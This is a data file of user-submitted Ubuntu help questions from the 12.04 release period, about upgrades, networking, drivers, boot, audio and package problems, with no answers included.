130558	problem while upgrading from ubuntu 11.10 to 12.04 ; upgrade manager seems to be hanged/stuck	the screen shot says it all . i got an automatic upgrade pop up to update the os to 12.04 from 11.10 . it worked fine for an hour or so and for past hour it 's stuck at `` about 4 minutes remaining '' screen . in the background terminal , the `` top '' processes are shown . this question is not answered satisfactorily anywhere as the release is pretty new . what is the best way to deal with this situation ? additional info : i am seeing some of my software programs like remmina , firefox , google-chrome are having some new looks and may be other apps to . does it mean that , everything has went fine and the box shown in figure is just a spurious message ?
130562	usb ports unavailable after suspend	my problem is that after installing ubuntu 12.04 on my laptop , suspend did not work . through this training , i solved the suspend problem . but after resume from suspend my usb ports become unavailable .
130563	what can i backup to avoid re-downloading the updates i have installed if i am forced to erase & install ubuntu ?	it 's just been days since i started using ubuntu on my pc and i 'm doing my best to keep it updated at all times via 'update manager ' . but what i 've noticed is that if i update today the next day when i log in there is a new set of updates waiting for me . i want to keep these updates as a backup so i do n't have to download the updates all over again if i am forced to freshly install ubuntu . so what do i backup ? note : i 'm doing this following some random website i visited while surfing the net . this is what i 'm doing ( in terminal ) to backup files sudo su cd / tar cvpjf backup.tar.bz2 -- exclude=/proc -- exclude=/lost+found -- exclude=/backup.tar.bz2 -- exclude=/mnt -- exclude=/sys / and to restore it i 'm using this ( after i put backup.taz.bz2 in the root location ) sudo su cd / tar xvpfj backup.tar.bz2 -c / but i 'm not sure if this backups the updates ... does it ?
130564	how to get the launcher in 12.04 to `` dodge windows '' like it does in 11.10 ?	i want the 12.04 launcher to act like it did in 11.10 , where it would only hide if it was being dodge by a window not remain hidden until you touch the left side of screen with your mouse , like it does in 12.04 . is there anyone way to do that ?
130568	create new new launcher icon in unity in 12.04	how to create new launcher icon in unity ? for example , i wrote a bash script , and i want add to unity panel . thank you .
130573	12.04 - clean installation failed on apt configuration failure	i tried to install ubuntu 12.04 on the partition where i had ubuntu 10.10 , by first formating the partition ( ext4 ) and keeping the same partition settings ( the mount point is '/ ' ) . i use the ubuntu installation disk i made on a usb drive . installation went fine until an error indicating a failure in apt configuration from the cd . and now the system is n't bootable anymore : grub error , file not found what can i do ?
130574	ip address change wo n't take effect	i use static ip adresses . when changing the ip of a network interface ( eth0 or wlan0 ) the settings are saved to the network connections but when running ifconfig or looking at network settings , either connections retain the old ip address . i have tried restarting the networking service , the computers ( yes , this occurs on more than one ) and even reinstalling the os . please can somebody help me . i 'm losing out on so much work this past week just trying to get ubuntu 12.04 working like a normal os . using the command sudo ip addr add 192.168.0.1/24 dev eth0 sometimes works ... the command switches the interface off , then when re-enabling it the ip reverts again . aaargh !
130579	graphics corrupt after upgrade from 11.10 to 12.04	i 'm stuck at the moment with an ubuntu that boots into an unusable white screen after upgrading from 11.10 to 12.04 . i 've tried booting into safe x mode but it just throws me back to the safe menu every time . restore previous graphics driver , use default graphics configuration and set up new graphics configuration all do n't work either . i 've tried various methods of resetting the graphics from the command line , but none are working due to unmet dependencies . these can not be fixed by doing the normal `` apt-get -f install '' because its saying there is a dpkg error in var/lib/dpkg/status ( blank line relating to skype-wrapper ) . i have n't been able to find any other way to fix the dependencies yet . can someone please give me some advice on what to do , i really do n't want to go the re install route .
130580	launcher feature `` dodge windows '' is no longer available in 12.04	previously , the launcher will be autohide when we maximize the window of any applications and will remain visible when there is no active application opened . in 12.04 this feature is no longer there and the only choice is to autohide or always show the launcher as in windows . is there any way i can get it back to previous state like describe above ?
130582	startup/shutdown screen / grub changed after installing xfce	i installed 12.04 right after release . yesterday i tried xfce4 . first i tried to install it using apt-get install xfce4 xfce4-goodies this worked , except i did n't get xubuntu theming . so i installed xubuntu-desktop package . but now my startup/shutdown screens are changed to xubuntu style , and grub even says debian . how do i revert these changes without uninstalling xfce xubuntu theming ?
130587	ca n't connect to internet using dhcp and cable modem	i 'm new to linux but liking it so far . my symptom is that i have a machine which dual boots winxp and ubuntu -- internet works on winxp , not on ubuntu . some specs : ubuntu 11.10 ; amd athlon 64 processor ; network interface card by realtek ( rtl-8139/8139c/8139c+ ) ; cable modem by scientific atlanta ( 2100r2 ) . the connectivity is cable > modem > pc ( by dsl ) the first times i booted into ubuntu from cd , could not connect to internet . after installing on hdd , and booting ( not from cd ) , internet worked once , and never again . searching around , i decided to try editing /etc/network/interfaces used to read : auto lo iface lo inet loopback based on posts , i decide to change it to auto lo eth0 iface eth0 inet dhcp iface lo inet loopback and run sudo /etc/init.d/networking restart this gives me a message about the command being deprecated , and then hangs so i kill it . i reboot and now in the splash screen i see `` waiting for network configuration '' then `` waiting up to 60 seconds for network configuration '' then `` booting without full network configuration '' . reading more online , i decide to keep /etc/network/interfaces the same , and edit file /etc/networkmanager/networkmanager.conf : [ main ] plugins=ifupdown , keyfile [ ifupdown ] managed=true # it was originally false this changed nothing . when i run the command ifconfig -a : eth0 link encap : ethernet hwaddr 00:14:2a:03 : f0:77 inet6 addr : fe80 : :214:2aff : fe03 : f077/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:22 base address:0xdf00 eth0 : avahi link encap : ethernet hwaddr 00:14:2a:03 : f0:77 inet addr:169.254.7.133 bcast:169.254.255.255 mask:255.255.0.0 up broadcast running multicast mtu:1500 metric:1 interrupt:22 base address:0xdf00 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:488 errors:0 dropped:0 overruns:0 frame:0 tx packets:488 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:38880 ( 38.8 kb ) tx bytes:38880 ( 38.8 kb ) i find it weird that i have no inet address for first entry for eth0 , and why two entries ? actually , i do n't know if that 's unusual . reading further , i decided to try to force a static ip address , you can tell me if that makes no sense . i changed /etc/network/interfaces to read : auto lo iface lo inet loopback address 127.0.0.1 netmask 255.0.0.0 auto eth0 iface eth0 inet static address 192.33.137.200 netmask 255.255.255.0 gateway 99.241.122.1 and reboot . this did n't help a bit . been searching everywhere . dhcp is supposed to just 'work ' . what else to do ? a bit more info : when i run route : kernel ip routing table destination gateway genmask flags metric ref use iface default * 0.0.0.0 u 1002 0 0 eth0 link-local * 255.255.0.0 u 0 0 0 eth0 and when i run sudo lshw -class network : *-network description : ethernet interface product : rtl-8139/8139c/8139c+ vendor : realtek semiconductor co. , ltd. physical id : 5 bus info : pci @ 0000:02:05.0 logical name : eth0 version : 10 serial : 00:14:2a:03 : f0:77 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=8139too driverversion=0.9.28 duplex=half latency=64 link=yes maxlatency=64 mingnt=32 multicast=yes port=mii speed=10mbit/s resources : irq:22 ioport : df00 ( size=256 ) memory : fddff000-fddff0ff well , i am mucking around in things i do n't understand . time to ask : any help is much appreciated ! i am teachable .
130588	is there a vhdl simulator ?	i had some work for fpga on windows , but now i want to change the platform to linux . i am looking for some vhdl ide instead of xilinx ?
130589	how can i dual boot ubuntu with windows 7 ?	can you explain , how can i dual boot ubuntu with windows 7 . i 'm using windows 7 and i want to install 12.04 .
130592	12.04 : lightdm freezes while `` logging in ... '' - maybe due to deactivated login sound	good morning , lightdm freezes often after i entered my passwort . it hangs exactly saying `` logging in ... '' . it 's no total system breakdown though . i found out that there is already an existing bug report for that problem which affects a lot of people : https : //bugs.launchpad.net/lightdm/+bug/986967 some people in launchpad report that the problem may be caused by deactivating the login sound with ubuntu tweak . i 've done that so it might be true . there are 3 dupiclate question for this problem on askubuntu too : ubuntu 12.04 hangs on login 12.04 lightdm can not login stuck at login screen
130598	will i loose all the non-default packages if i upgrade from 11.10 to 12.04 using a live cd/dvd ?	i have downloaded the iso of ubuntu 12.04 . but before i go for an upgrade , i want to know whether i shall lose all those non-default packages including restricted extras if i upgrade using a live cd/dvd . while upgrading , i will not have an internet connection .
130604	ubuntu 12.04 lts keeps crashing and hanging on my company 's pc	i just upgrade ubuntu 10.04 lts to 12.04 lts on all my company 's pc . the upgrade went smoothly without any problem . but as we start to launch an application , ubuntu 12.04 hangs and sometimes crashes without any apparent reason . we can not do any single thing on ubuntu 12.05 lts as it keeps hanging all the time . we 've tried rebooting our pc manually for many times but still get the freezing desktop . i thought ubuntu 12.04 lts should be the latest stable release ? any solution on this ? p/s : i 'm writing this question from a windows pc .
130627	how to integrate keepass and chrome/chromium using chromipass ?	i 'm trying to integrate keepass and chrome/chromium after installing chromipass when i try to connect to keepass , it gives the following error : chromeipass has been disconnected from keepasshttp . association was unsuccessful press the reconnect button to establish a new connection . how can i connect chromeipass with keepass ?
130631	ubuntu 12.04 asus eee pc 1005 weird keyboard	after upgrading to 12.04 on my netbook the keyboard got weird behaviour before logging in to any session everything 's ok ( i tested the input in vt1 ) but as i log in with any session ( unity or unity-2d ) keyboard behaves as if fn key was pressed ( i got numbers and special symbols instead of normal chars . i think the problem may be in acpi support , but i do n't know where to start exactly . i will appreciate any help = ) p.s . sorry for my english - i am not a native speaker = )
130634	java error when installing software	when i try to install third party software ( spss 20 ) i get this error message : 2472 : exec : /tmp/install.dir.2799/linux/resource/jre/jre/bin/java : not found i fixed this issue in wubi by installing sun java and making it env var . now i 've installed ubuntu alone and tried the same tricks , but i get that error . i also get this : strings : '/lib/libc.so.6 ' : no such file . i did get that with wubi , but it did n't affect the installation . what could the problem be ?
130640	please give me some information for doing partition	i want to install ubuntu 12.04 in my pc but i have no knowledge about doing partition please give some informations for doing partition my system configuration is : hard disk 20gb ide processor : intel ( r ) pentim ( r ) 4 cpu 2.40ghz ram : 1 gb
130642	unable to change the screen resolution	i am unable to change the screen resolution . my pc is asus m/b and using onboard graphics . i installed the ubuntu 11.10 thru vmware player . in the appearance window it is showing a resolution of 1920 x 1280 and i need to use mouse to cover various corners of screen . i tried to change the resolution but to no avail . please tell me how to change resolution ?
130645	my laptop keeps locking on lid close , ignoring my settings	whenever i close my laptop 's lid , it locks and i have to enter my password to get it to resume . in my power settings , i have selected `` do nothing '' for the option `` when lid is closed '' for both `` on battery power '' and `` when plugged in '' state . what 's going on ?
130649	some menus are in chinese/japanese !	yesterday i shutdown my computer and today when i powered it on and logged in to 12.04 , certain strings are in japanese/chinese ( i do n't know how to differentiate between the two ) . the strings are : applications , places menu selector in my panel . under 'places ' , the 'home folder ' , 'desktop ' , 'computer ' . the menus in vlc ! certain applications like 'sound converter ' , etc . how can i change everything back to english ? i 'm using gnome classic in ubuntu 12.04 .
130652	restart does n't work on ubuntu 12.04 but shutdown	i 'm a newbie to linux and ubuntu but i installed it as the second os ( after win7 ) on my sony vaio netbook . everything 's working fine except for ubuntu does n't restart properly . shutting down is working well but when doing a restart it looks like it is restarting but then it shows a black screen and fails to re-boot . what i have to do is force its shutdown by holding the power button . i remember having experienced a similar problem with an earlier ubuntu version running on completely different hardware , too . please , help me resolve it . regards ralf
130656	accidentally removed /usr/local/ directory . now what ?	i accidentally removed /usr/local/ directory . i have not reboot or anything . i am now root . do i have to install ubuntu again or just create a new user ? thanks .
130657	graphics card is not recognized in system info	my graphics card is not recognized in system info , it is an onboard gma 965gm ( or x3100 ) , but i can still play games which require 3d acceleration . how can i correctly install the drivers ? thank you edit : it runs on ubu 12.04 after running the lspci -v command it came up with the following the os is 12.04 . 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : apple inc. device 00a1 flags : bus master , fast devsel , latency 0 , irq 44 memory at 90100000 ( 64-bit , non-prefetchable ) [ size=1m ] memory at 80000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 6110 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : intelfb , i915 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 03 ) subsystem : apple inc. device 00a1 flags : bus master , fast devsel , latency 0 memory at 90200000 ( 64-bit , non-prefetchable ) [ size=1m ] capabilities : < access denied > it seems to my noob eyes that the card is recognised , but it doesnt show up in system settings nor in the additional drivers .
130662	how can i convert the nvidia driver installer into a deb ?	every so often there 's a beta version of the nvidia driver that i want to try out . this has happened today : there 's been a big performance issue with version 295.40 and i want to try the shiny new xrandr-enabled 302.07 . i 'm more than able to download the installer , remove all the repo-installed driver files and install the new version but it 's frankly a pain in the bottom to turn that around and go back to the repo version . it also means i have to re-install the driver manually each time there 's a kernel upgrade . the other option we commonly give people is a ppa but in this case i 'm being really impatient . it 's going to be a few days before any ppa gets this but i need to try this today . i 've already manually installed it on the media centre and i 'm eyeing up my desktop now . so how do i take an installer ( eg : nvidia-linux-x86-302.07.run ) and convert that into a new nvidia-current/nvidia-current-updates package ? another way of asking this might be : how do people package the nvidia drivers ?
130667	how can i tell ubuntu to keep the correct routing table ?	ubuntu sets a wrong routing table if the router is switched off and on again : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.1.1 0.0.0.0 255.255.255.255 uh 0 0 0 wlan0 in order to get a correct route i have to manually delete the wlan connection and set it up fresh ( as if i connect to that wlan the very first time ) ; ubuntu then asks me for the wlan password . and then i get the correct routing table : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 however , it does n't keep that routing table correctly . how can i force ubuntu to automatically choose the proper route without having to manually delete the wifi connection each time ? i 'm using ubuntu 12.04 64-bit . yes , i 'm using dhcp . it 's about the wifi . the ethernet works , but wifi always gets wrong routing tables . and it 's definitely a ubuntu bug , because on a fresh install it 's like that . no matter if it 's ubuntu , kubuntu or xubuntu ( i tried them all ) . does n't happen with other non-ubuntu based distros . also does n't happen with windows 7 . this bug was introduced with 11.04 . because i tried this version , too . same problem . and i also tried version 10.04 then . with 10.04 the wifi tables are correct and it works . as of version 11.04 routing tables are messed up . ubuntu messes up the routing tables when the router is switched off and on again . then i have to delete the wifi connection in the networkmanager and set it up fresh in order to get a correct routing table again . as i said , it 's purely an ubuntu problem . no problems with other distros .
130670	ubuntu 12.04 does n't install on my laptop with win-7	i have a hp probook 4410s with windows 7 as default os . for the last two years i have ubuntu side by side and the latest version was 11.10 . i wanted to upgrade to 12.04 by installing wubi , which did n't work ( in fact , only thing happened was removal of previous version of ubuntu ) . later i downloaded an iso file and burnt it onto a cd . the laptop did n't start while booting with installation cd . the screen turned blank after some time and that 's all while i was able to install 12.04 on my desktop ( win xp , sp-3 ) with the same cd .
130673	why can i not boot from the hard disk ?	i installed 12.04 from a usb stick ( alternate image , 64-bit ) . if i boot off the usb , and select the option to boot from the hard disk , then it all works fine . but if i remove the usb stick and attempt to boot off the hard drive , then the computer does n't boot . instead , it displays the following message after the bios post : error : no boot disk has been detected or the disk has failed . the computer is an acer aspire x1470 . anyone know what i must do to get it to boot from the hard disk ? update : i 'm not sure what this means : $ sudo grub-install /dev/sda /usr/sbin/grub-setup : warn : this gpt partition label has no bios boot partition ; embedding wo n't be possible ! . /usr/sbin/grub-setup : warn : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/grub-setup : error : will not proceed with blocklists .
130674	how do i open deja dup as root ?	i wanted to backup /var/cache/apt/archives using 'deja dup ' but it keeps saying > > could not backup the following files . please make sure you are able to open them . /var/cache/apt/archives/lock any help ?
130675	how to run reaver in precise	i need to run sudo airmon-ng start wlan0 . in 11.10 , this works fine , but in 12.04 it does n't : it can not find the command . so i ran sudo apt-get install airmon-ng , but this is the result i get : building dependency tree reading state information ... done package aircrack-ng is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : iw e : package 'aircrack-ng ' has no installation candidate any ideas ?
130677	update to 12.04 lts	i want to update to 12.04 lts by follow the instructions from ubuntu.com but after pressing upgrade in the update manager he 's downloading the release upgrade tool and noting happens . i have checked for updates and installed them just like in the instructions . whats wrong ?
130679	upgrade failed ... kinda , now can not install some packages	when trying to upgrade my server ( using do-release-upgrade -d , as one currently has to when going from 10.04 to 12.04 ) , the script froze , and i was forced to cancel it . i was left with a half 10.04 , half 12.04 system , but was able to upgrade most of it manually using aptitude upgrade -- full-resolver . i am now at a point where it will boot no problem , and most of my applications are installed correctly , but there are a few packages which just will not install . i 've tried apt-get install -f , apt-get purge , dpkg-reconfigure -a , and i just ca n't think of anything to do . root @ ncli-server : ~ # apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 16 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up fontconfig-config ( 2.8.0-3ubuntu9 ) ... rmdir : failed to remove `/var/lib/defoma/fontconfig.d/ ' : directory not empty dpkg : error processing fontconfig-config ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of libfontconfig1 : libfontconfig1 depends on fontconfig-config ( = 2.8.0-3ubuntu9 ) ; however : package fontconfig-config is not configured yet . dpkg : error processing libfontconfig1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgd2-xpm : libgd2-xpm depends on libfontconfig1 ( > = 2.8.0 ) ; however : package libfontconfig1 is not configured yet . dpkg : error processing libgd2-xpm ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgphoto2-2 : libgphoto2-2 depends on libgd2-xpm ( > = 2.0.36~rc1~dfsg ) ; however : package libgd2-xpm is not configured yet . dpkg : error processing libgphoto2-2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libsane : libsane depends on libgphoto2-2 ( > = 2.4.10.1 ) ; however : package libgphoto2-2 is not configured yet . dpkg : error processing libsane ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of colord : colord depends on libsane ( > = 1.0.11-3 ) ; however : package libsane is not configured yet . dpkg : error processing colord ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libpoppler19 : libpoppler19 depends on libfontconfig1 ( > = 2.8.0 ) ; however : package libfontconfig1 is not configured yet . dpkg : error processing libpoppler19 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgs9 : libgs9 depends on libfontconfig1 ( > = 2.8.0 ) ; however : package libfontconfig1 is not configured yet . dpkg : error processing libgs9 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cups-filters : cups-filters depends on libfontconfig1 ( > = 2.8.0 ) ; however : package libfontconfig1 is not configured yet . cups-filters depends on libpoppler19 ; however : package libpoppler19 is not configured yet . dpkg : error processing cups-filters ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libcairo2 : libcairo2 depends on libfontconfig1 ( > = 2.8.0 ) ; however : package libfontconfig1 is not configured yet . dpkg : error processing libcairo2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of poppler-utils : poppler-utils depends on libcairo2 ( > = 1.10.0 ) ; however : package libcairo2 is not configured yet . poppler-utils depends on libpoppler19 ; however : package libpoppler19 is not configured yet . dpkg : error processing poppler-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cups : cups depends on poppler-utils ( > = 0.12 ) ; however : package poppler-utils is not configured yet . cups depends on cups-filters ; however : package cups-filters is not configured yet . dpkg : error processing cups ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of printer-driver-gutenprint : printer-driver-gutenprint depends on cups ( > = 1.3.0 ) ; however : package cups is not configured yet . dpkg : error processing printer-driver-gutenprint ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ghostscript : ghostscript depends on libgs9 ( = 9.05~dfsg-0ubuntu4 ) ; however : package libgs9 is not configured yet . dpkg : error processing ghostscript ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gs-cjk-resource : gs-cjk-resource depends on ghostscript ( > = 8.70~dfsg-2.1 ) ; however : package ghostscript is not configured yet . dpkg : error processing gs-cjk-resource ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ghostscript-cups : ghostscript-cups depends on ghostscript ( > = 8.64~dfsg-8 ) ; however : package ghostscript is not configured yet . dpkg : error processing ghostscript-cups ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : fontconfig-config libfontconfig1 libgd2-xpm libgphoto2-2 libsane colord libpoppler19 libgs9 cups-filters libcairo2 poppler-utils cups printer-driver-gutenprint ghostscript gs-cjk-resource ghostscript-cups e : sub-process /usr/bin/dpkg returned an error code ( 1 )
130682	reporting a bug when you do n't know where the problem is	since i installed 12.04 my laptop ( hp elitebook 2760p ) my computer started to hang occasionally . when this happens the screen freezes , music hangs ( `` waltzing matildaaaaaaaaaaaaa [ etc ] '' ) and there 's nothing i can do but turn it off by holding the power button . before , running 11.10 , i did n't get a single crash in about 5 months . i 'd love to report the bug but just do n't know where to start . i do n't know which programme causes the crash , can not reproduce it when i want to , and even ca n't find any reference to the crash in the system logs ( kern.log nor syslog ) . i suspect the intel graphics chip , it has given me issues ever since i installed 12.04 . a bug or two for this chip can be found on launchpad . lspci gives me : vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) all updates are applied . does anyone have any good ideas ? where can i start to try and fix or report the problem ? let me know if you 'd like to see any files . i 'll keep a list below of the things i try . reinstall ubuntu , removing all hidden ( . * ) folders and files from my /home folder before running set-up do a memory check , just to be sure . no errors encountered in a single run . the following is still on my to do list : try the magic combination : alt+printscreen , while holding them pressing r s e i u o ( see http : //techspalace.blogspot.com.au/2008/07/magicsysrq-keys.html ) try to approach the computer through ssh
130686	maximise window shortcut misbehaves since 12.04 upgrade	in 11.10 , i used alt+f10 to maximise a window . i 've used it so often , ctrl+alt+t and alt+f10 have become a learned motion when setting up for work . since i 've upgraded to 12.04 , a single press of alt+f10 opens up the file menu . mashing it a couple of times does eventually maximise the window . it seems something is hogging alt+f10 for a different mapping , yet when i look at system settings- > keyboard- > shortcuts , the only thing mapped to alt+f10 is maximise window . where else could i look for mapped shortcuts so i can fix this conflict ?
130688	avahi-daemon troubles	i did a clean install ( keeping my old home partition ) of ubuntu 12.04 . everything working fine , except the process avahi-daemon is consuming a lot ( 60-90 % ) cpu . what is the avahi-daemon ? does it have something to do with ubuntu one ? i found guides on the internet on how to disable it , but i 'm not eager to disable it , as it appearantly has use . hardware : dell studio 1557 , intel i5 , amd radeon hd5470 thanks !
130690	isa proxy server	have a proxy at work that runs microsoft isa . i used to be able to connect using 11.10 with firefox no problem at all . i could either put the settings in firefox or the settings in ubuntu network proxy settings . this would give me a connection no problem ( slow due to the work network being really lame ) since i upgraded with 12.10 firefox just crashes if i have any proxy settings ( manual added the proxy settings ) . if i connect to a diffrent network without the proxy settings it works fine and does n't crash i tried chrome to see if that would work ... simular problem . chrome does n't crash but is so slow it just times out all the time and can take 10min for a page to load ... . not really sure where to go with this ? i have tried a clean install of 12.04 on 2 diffrent computers and also both tried just upgrading from 11.10 . only answer i can see at the moment is role back to 11.10 : ( i have tried all sorts like turning of ipv6 to see if that would make any diffrence but no joy ... really am lost now . whats weird is the repositys are also really really slow through 12.04 . 50 megs took an hour to download ( isa server has ubuntu rep servers enables without authenication ) . really am lost
130691	problem with file synchronization for huge amount of files using ubuntu one in 12.04	i wanted to use ubuntu one for the synchronization of the most important stuff on my harddisk between two laptops and my desktop . so i collected the cluttered files from all three systems to an external drive and then to some folder inside my home directory on my desktop ( ~30 gb of data ) . then i bought enough space ( 3 * 20 gb = 60 gb ) on ubuntu one and added the folder to the synchronization . unfortunately it does not work . the client prints out the message that it starts synching files ( message in german : `` abgleichen von dateien wird gestartet ... '' ) for several hours . nautilus becomes quite slow during that time and finally after those hours i get the message that file synchronization is deactivated ( message in german : `` abgleichen von dateien ist deaktiviert '' ) . anyone any idea what 's the problem or how i can get further error details ? from u1sdtool -status i get : u1sdtool -- status state : local_rescan connection : with user with network description : doing local rescan is_connected : false is_error : false is_online : false queues : working
130693	windows / ubuntu dualboot : pulseaudio ca n't start - ntfs home folder	i installed ubuntu on my dell 1555 laptop and decided to make it dual boot with windows 7 . i wanted to share the home folder with the `` my documents '' folder in windows , so i created an extra partition for this folder . sadly , the ext3 partition did n't showed up , so i decided to format it to ntfs . now , everything works just fine , but the audio fails . i can hear sound , but i ca n't change the volume . neither on the unity bar nor in the audio settings . on the bar , the speaker symbol has just three dahses behind it , the settings are greyed out . also , my soundcard wo n't show up in the settings ... after some reading i think i found out , that pulseaudio fails to start . it gives me that : user @ user-laptop : ~ $ pulseaudio -- start e : [ autospawn ] core-util.c : home directory /home/user not ours . w : [ autospawn ] lock-autospawn.c : fehler beim zugriff auf autostart-sperre . e : [ pulseaudio ] main.c : failed to acquire autospawn lock so i did : user @ user-laptop : ~ $ ls -l /home/ insgesamt 12 drwxrwxrwx 1 root root 4096 mai 1 16:00 benutzer drwxrwxrwx 1 root root 0 mai 1 15:58 $ recycle.bin drwxrwxrwx 1 root root 0 mai 1 15:48 system volume information drwxrwxrwx 1 root root 8192 mai 3 12:14 user i think my problem is , that i must be the owner of the home folder chown -r user /home/user/.dmrc chmod 600 /home/user/.dmrc chown -r user /home/user chmod 755 /home/user sadly , this wo n't work too . so i came up with adjusting the fstab : # /home was on /dev/sda4 during installation uuid=493a893161c9a186 /home ntfs-3g defaults , nls=utf8 , umask=077 , uid=user , gid=users , usermapping=/home/ , dmask=002 0 0 i listed usermapping=path in the options , because i 've read that there is a usermapping on each ntfs partition , located in a hidden folder ( .ntfs-3g ) . but this folder does n't exists too . in order to repair my audio , i created .xinitrx and .xsession for pulseaudio . i do n't know if this helps anyone ... so for conclusion : all i want is to adjust my audio volume , everything else is working afaik
130695	please assist to recover data after unsuccessfull upgrade to 12.04	now my ubuntu shows the loading screen and does n't load any further . i made a live cd and booted from it but i ca n't explore the needed files . i read that the partition with the installation has to be mounted but i 'm not sure . please help because my information is very important to me . 10x in advance .
130696	suddenly , 12.04 is muted	before shutting down last time , i was hearing songs on vlc . now after rebooting , suddenly my system is muted . when i took `` sound settings '' , all the controls there are deactivated ( as in gray and i 'm not able to click anything ) . when i tried opening vlc again , it said : audio output failed : the audio device `` default '' could not be used : device or resource busy . i 'm using 12.04 , gnome classic . how can i get sound back on my system ?
130708	firefox addon that extract 's youtube urls	we have a country-wide ban on youtube.com , which means that you ca n't watch or download youtube content even educational stuff or documentaries . proxy or vpn are next to unusable for watching or downloading ( the data rates are throttled as soon as the video or download begin ) . i am after a mozilla add-on or program which would allow me to retrieve only the direct url to a video on youtube . i intend to pass this as a command-line argument to 'wget ' running on a remote server which can then download the video.i know this method works , since i have indeed managed to extract the link once or twice and use the 'wget ' command on the remote server to get it for me . i 've tried several youtube downloaders for firefox and they all want to take over the download themselves which of course will not work . also any links you get from the add-ons i tried ( some offer 'copy link ' options ) are also useless for my intended purpose . all i need is the link to pass on to a command-line tool such 'curl ' or 'wget ' . as usual , thanks in advance for any feedback provided
130710	how to remove guest session from the switch user list ?	i have removed the ubuntu guest account from lightdm , but there is still a way of getting in to it , via the `` switch user '' menu in the top right corner . is there anyway to remove this ?
130712	sqlite stopped working after upgrade	as many of you did , i upgraded from lucid to precise this week and almost everything seems to work find . everything exceptâś sqlite , which was working well before but not anymore . i checked everything : phpinfo ( ) , php.ini , sqlite3.ini . the sqlite command works fine , but when i try to use php ... *plop* , nothing works . i get the message fatal error : class 'sqlitedatabase ' not found in /var/www/test/sqlite/index.php on line 4 line 4 being $ db = new sqlitedatabase ( 'test.sqlite ' , 0666 ) ; any hint ? edit you can see my phpinfo ( ) here : http : //pastebin.com/jq7bz0gn the apache log is * restarting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ... waiting apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername
130713	xubuntu 12.04 : use unity-greeter and set user background automatically	on a fresh xubuntu 12.04 installation i have set greeter-session=unity-greeter in /etc/lightdm/lightdm.conf . also i have installed unity-greeter gnome-settings-daemon . now i want to change the behavior of unity-greeter to what it does in a vanilla ubuntu : change the wallpaper in the greeter to the user-wallpaper .
130719	can i have my own collection of pictures ( one fading into another ) as my background ?	i 've seen certain ubuntu wallpapers which is a collection and one keeps fading into another . is it possible to create such a set of pictures of our own to be used as the desktop wallpaper ?
130720	linux kernel 3.3.4 under ubuntu 12.04	i just installed kernel 3.3.4 using the instructions from : http : //www.upubuntu.com/2012/05/how-to-install-linux-kernel-334-under.html anyway , now when i try to log into this version i just get a black screen that just hangs and nothing happens . does anyone have any ideas ? ? thank you !
130726	win 7 virtual box vm fails to start after upgrade to 12.04	i upgraded my ubuntu os on my laptop from 11.10 to 12.04 , i did the virtual box work arounds mentioned in the thread : virtualbox does n't load after 12.04 upgrade , my turnkey linux vm 's are back up and running now however my windows 7 vm has failed to come up . my whole laptop freezes and i have to force restart my laptop each time i try to start my windows 7 vm . is there a work around to ensure smooth startup and running of win 7 vm's my virtual box version is 4.1.12_ubuntu r77245
